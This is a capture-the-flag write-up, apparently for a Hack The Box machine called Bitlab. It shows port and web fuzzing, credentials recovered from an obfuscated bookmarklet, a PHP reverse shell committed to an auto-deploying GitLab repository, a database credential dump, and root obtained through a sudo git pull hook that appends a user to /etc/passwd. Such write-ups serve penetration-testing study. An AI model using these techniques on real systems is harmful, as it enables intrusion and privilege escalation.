Difficulty: Medium
Technologies: Apache, Postgres, Gitlab
Vulnerabilities: Web fuzzing, Credentials in data files, sudo permissions
Walkthrough
Scan for open ports:
nmap -n -Pn -sS 10.10.10.114 -p -
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpThe web server shows a GitLab login at http://10.10.10.114/users/sign_in (all requests are redirected to it)
Additional fuzzing shows
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hc 404,302 http://10.10.10.114/FUZZ/
...
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000974: 401 0 L 10 W 49 Ch "MANIFEST.MF"
000001058: 401 0 L 10 W 49 Ch "Thumbs.db"
000001629: 401 0 L 10 W 49 Ch "access-log.1"
000001631: 401 0 L 10 W 49 Ch "access.1"
000001634: 401 0 L 10 W 49 Ch "access_log.1"
000002401: 400 3 L 10 W 90 Ch "användare"
000004557: 301 0 L 5 W 86 Ch "ci"
000004649: 200 307 L 956 W 15715 Ch "clave"
000007288: 200 247 L 790 W 13376 Ch "explore"
000007427: 301 0 L 5 W 169 Ch "favicon.ico"
000008843: 200 15 L 51 W 870 Ch "help"
000011348: 401 0 L 10 W 49 Ch "manifest.mf"
000011466: 401 0 L 10 W 49 Ch "master.passwd"
000014518: 200 170 L 350 W 4184 Ch "profile"
000014704: 200 248 L 796 W 13456 Ch "public"
000015551: 200 74 L 211 W 2153 Ch "robots.txt"
000015591: 200 307 L 956 W 15730 Ch "root"
000016010: 200 217 L 765 W 13074 Ch "search"
000016637: 401 4 L 15 W 125 Ch "sitemap.xml"
000017669: 401 0 L 10 W 49 Ch "tar.bz2"
000017670: 401 0 L 10 W 49 Ch "tar.gz"
000019490: 401 4 L 15 W 125 Ch "web.xml" Browing the pages we get to http://10.10.10.114/help/bookmarks.html which has some interesting encoded part (encoded with https://www.unphp.net)
javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()
function(){ var _0x4b18=["value","user_login","getElementById","clave","user_password","11des0081x"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })It seems we have found some login data user: clave pass: 11des0081x
Browsing through the gitlab we find two repositories: Profile and Deployer. It seems there a some automatic hooks to deploy changes in Profile to the local machine. We commit a php reverse shell into the Profile Repository and call it
http://10.10.10.114/profile/rev.php
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.114] 57052
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
14:18:01 up 1:22, 0 users, load average: 0.43, 0.26, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ id -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)Browsing further we find a code snippet at http://10.10.10.114/snippets/1 contaning some postgresql credentials. We enhance the script and upload in onto the server
<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");
while ($row = pg_fetch_row($result)) {
echo "ID: $row[0] User: $row[1] User: $row[2]";
echo "<br />\n";
}
?>http://10.10.10.114/profile/db.php
ID: 1 User: clave User: c3NoLXN0cjBuZy1wQHNz==
The password can be decoded using https://www.base64decode.org/
user: clave pass: c3NoLXN0cjBuZy1wQHNz== / ssh-str0ng-p@ss
We are able to log in using these SSH credentials
ben@kali:~$ ssh clave@10.10.10.114
clave@10.10.10.114's password:
Last login: Thu Oct 31 14:41:32 2019 from 10.10.14.29
clave@bitlab:~$ id -a
uid=1000(clave) gid=1000(clave) groups=1000(clave)
clave@bitlab:~$ ls
RemoteConnection.exe user.txt
clave@bitlab:~$ cat user.txt
1e3fd81ec3aa2f1462370ee3c20b8154On user www-data we see some sudo permissions
$ sudo -l
Matching Defaults entries for www-data on bitlab:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bitlab:
(root) NOPASSWD: /usr/bin/git pullWe are creating a GIT clone with a pull hook
clave@bitlab:~$ /usr/lib/git-core/git clone /srv/docker/gitlab/gitlab/repositories/root/profile
Cloning into 'profile'...
done.
clave@bitlab:~/profile$ cat .git/hooks/post-merge
#!/bin/bash
echo "firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash" >> /etc/passwdWe are committing a change and a pull afterwards to trigger the hook
$ cd /home/clave/profile
$ sudo /usr/bin/git pull
From /srv/docker/gitlab/gitlab/repositories/root/profile
7df1663..c6721d7 master -> origin/master
* [new branch] patch-11 -> origin/patch-11
Updating 7df1663..c6721d7
Fast-forward
index.php | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)Seems we have root
clave@bitlab:~/profile$ su - firefart
Password:
root@bitlab:~# id -a
uid=0(root) gid=0(root) groups=0(root)
root@bitlab:~# cat root.txt
8d4cc131757957cb68d9a0cddccd587c
Schreibe einen Kommentar